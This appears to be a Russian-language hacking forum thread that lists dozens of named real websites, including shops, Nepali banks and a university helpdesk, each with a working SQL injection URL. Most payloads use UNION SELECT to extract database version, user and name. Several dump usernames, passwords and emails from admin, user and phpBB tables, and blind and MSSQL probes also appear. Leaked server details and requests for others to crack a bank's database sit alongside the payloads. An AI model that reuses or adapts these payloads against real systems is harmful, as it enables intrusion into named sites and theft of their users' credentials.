http://www.windoor.ro/index.php?page=article&id=-31+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3 Version : 4.0.24-log Database : windoor User : windoor@localhost Os : pc-linux-gnu
http://www.aiaccessory.com/part.php?id=-11226+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7 4.0.13:[email protected]:MYSQL0256 --- http://www.gk-linkor.ru/part.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6 4.1.22-log:[email protected]:gk_linkor_db --- http://rusnauka2009.org/part.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10 4.1.22-standard:rusnauk_rusnauk@localhost:rusnauk_biz
Code: http://www.iitis.gliwice.pl/en/laboratory.php?ID=-1)+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4/* Code: webmaster@localhost:iitis:4.1.11
Code: http://www.tricountyauto.com/part.php?ID=-18+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6 4.0.24-standard:tricount_web@localhost:tricount_db Code: http://iswebsite.com/part.php?vArticleID=-357+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5 4.1.22-standard:iswebsit_admin@localhost:iswebsit_article Code: http://www.claudinepisko.be/fr/code/part.php?id=7+and+substring(version(),1,1)=5 Code: http://www.sortecs.ru/comp.php?id=33&idsub=94+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16/* 4.1.22-log:sortecs2_sortecs@localhost:sortecs2_new Code: http://www.sctrade.ru/news.php?a=39+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/* 4.1.22-standard-log:[email protected]:sctrade_main Code: http://www.osacorp.ru/content.php?id=27&idsub=-49+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13 5.1.29-rc-logsacorp@localhostsacorp_main Code: http://www.msn-media.ru/docs_view.php?ss=-10+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6 5.0.67-log:[email protected]:msnmedi_msn Code: http://www.m-furnitura.ru/comp.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12 5.0.67:m-furnitura@localhost:m-furnitura На сайте есть форум, phpbb, Достать акки оттуда проблем не составит правда форум пустой эти сайты, некой Дизайн-студии Patix. Пробежался быстренько по портфолио, все сайты уязвимы. patix.ru
Сэкс шоп ёпть www.eros.by Code: http://www.eros.by/index.php?raz=0&ch=16&prod=703'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+ 5.0.45:h_erotikon@localhost:h_erotikon в базе ничо интересного =| ps не подумайте я там не покупал ничо, так мимо проходил
http://www.transinsular.net/ver_producto.php?id=999999999999999999+union+select+1,2,3,4,5/* http://www.sealquilatodo.com/ver_producto.php?id=9999999999999999999999999+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,id,usuario,password,nombre,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+usuarios+limit+0,1-- Шопчег. PR 2. http://www.hand-ball.net/ver_producto.php?id=-211+union+select+1,version(),3,4,5,6,7,8,9,0,1,12/* http://www.baladiavalklein.com/english/ver_producto.php?id=-110+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,14/* http://www.projectitservices.co.uk/case_studies/details.php?id=-11+union+select+1,2,3,4,5-- PR 5. http://www.coinsportal.ru/News/Details.php?ID=-229+union+select+1,2,version(),4,5,6--
http://vsestanki.ru/tech.php?pid=-306+union+select+1,concat_ws(0x3a3a,id,pass,name,email,perm),3,4,5,6,7+from+users+--+ ЗЫ наверно в админке проверка ай пи http://semya.perm.ru/main/news.php?main=1&nid=-213+union+select+1,username,userpass,4,5,6+from+poll_user+--+ http://www.painter.perm.ru/gallery_short_work.php?id_artist_work=-2636+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,login,pass,viewed),12,13,14+from+artist+limit+2,1+--+
PR 4. http://www.calbank.net/newsite/news/details.php?id=-94+union+select+1,version(),3,4,5,6,7,8,9-- PR 4. http://www.downtownwaukesha.com/member-details.php?ID=-1190+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- SUNRISE BANK LIMITED, NEPAL PR 3. http://www.sunrisebank.com.np/news-events/details.php?id=-101+union+select+1,2,version(),4,5,6,7,8,9-- 4.1.22 нашел только таблицу news. походу только посимвольным брутом колбасить. господа, кто расковыряет - плз, отпишите в ПМ. Еще один банк Непала. DCBL Bank Limited. PR 4. http://www.dcbl.com.np/news-events/details.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9-- 4.1.22
Tic300 PR4 http://www.megachip.ru/catalog.php?open_code=-0202+union+select+concat_ws(0x3a3a,login,password,gid)+from+mega_user+where+login=0x61646D696E+--+ http://www.ekperm.ru/main/news.php?menuid=9§ion=-88+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,user_password),9,10,11,12,13+from+phpbb_users+limit+1,1+--+
Code: http://ownfl.com/owner.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 Code: ownfl02_commish@localhost:ownfl02_ownfl:5.0.67-community
http://globalbiz.com.np/view_advertisements.php?id=-1+union+select+1,2,concat_Ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12-- 5.0.67-community:globalbi_globprs@localhost:globalbi_myglobal
Code: http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/* Code: http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8/* root@localhost:5.0.45-community-nt-log:amteore file_priv:Y pr:2 godly_ecs@localhost:godly_ecs:4.0.26-standard-log
http://www.rendery.com/goods.php?p=good&t_id=-1+union+select+1,2,concat_Ws(0x3a,version(),user(),database())/* 4.1.22-standard-log rendery_root@localhost rendery_db
Code: http://linux-muzyka.ixion.pl/tekst.php?id=25047+and+substring(version(),1,1)=5 3-я мускуль: Code: http://www.lowiecki.pl/felietony/tekst.php?id=158+and+substring(version(),1,1)=3 Code: http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database()) 4.1.22-log[email protected]eoplepleasure Есть табличка: members Code: http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database()) 4.1.20:magicus_2@localhost:magicus_tmp_2 Code: http://trb-res.nl/tekst.php?id=562+and+substring(version(),1,1)=4 Code: http://www.demo.artframe.nl/tekst.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* 4.1.21-standard-log:artframe_demo@localhost:artframe_demo Code: http://www.kralen.com/tekst.php?id=173+and+substring(version(),1,1)=4 Code: http://www.ogledalce.co.rs/tekst.php?id=228+and+substring(version(),1,1)=5
MsSQL Code: http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=system_user Code: FORESTRY\IUSR_ZIRCOTE Code: http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=db_name() Code: helpdesk_dynamic Code: http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=@@version Code: Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Code: http://www.akvarijske-ribe.com/tekst.php?ID=32+and+substring(version(),1,1)=5 Code: http://www.esmayigitoglu.nl/tekst.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* 4.1.21-standard-log:esma_db@localhost:esma_db Code: http://www.windsurf.nieuwetonge.com/tekst.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(),database()),3 4.0.17-standard-log:nieuwetong@localhost:nieuwetong_cms
Code: http://www.fk-stroy.ru/catalog/abc/index.php?contentId=11212+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4 Code: [email protected]:u99295_fkstroy:5.0.67-log
Code: http://www.hsabc.org/content.php?id=10+and+substring(version(),1,1)=4/* Code: http://festklaveret.dk/tekst.php?id=-112+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 5.0.75:[email protected]:fk_site_data Code: http://tantra-klub.crolink.net/tekst.php?id=1+and+substring(version(),1,1)=4 третья скуля Code: http://www.virtualnahercegovina.com/balkan-press/tekst.php?id=641+and+substring(version(),1,1)=3 Code: http://www.sleepbootraaf.nl/tekst.php?id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* 4.1.21-standard-log:raaf_db@localhost:raaf_db Code: http://www.i-ceny.ru/p/?action=rubr&razdel=14&rub=140+and+substring(version(),1,1)=5 Code: http://www.ultra.art.pl/teksty/tekst.php?kid=11&id=-12+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6 5.0.27-log:[email protected]:fitomedic_b284
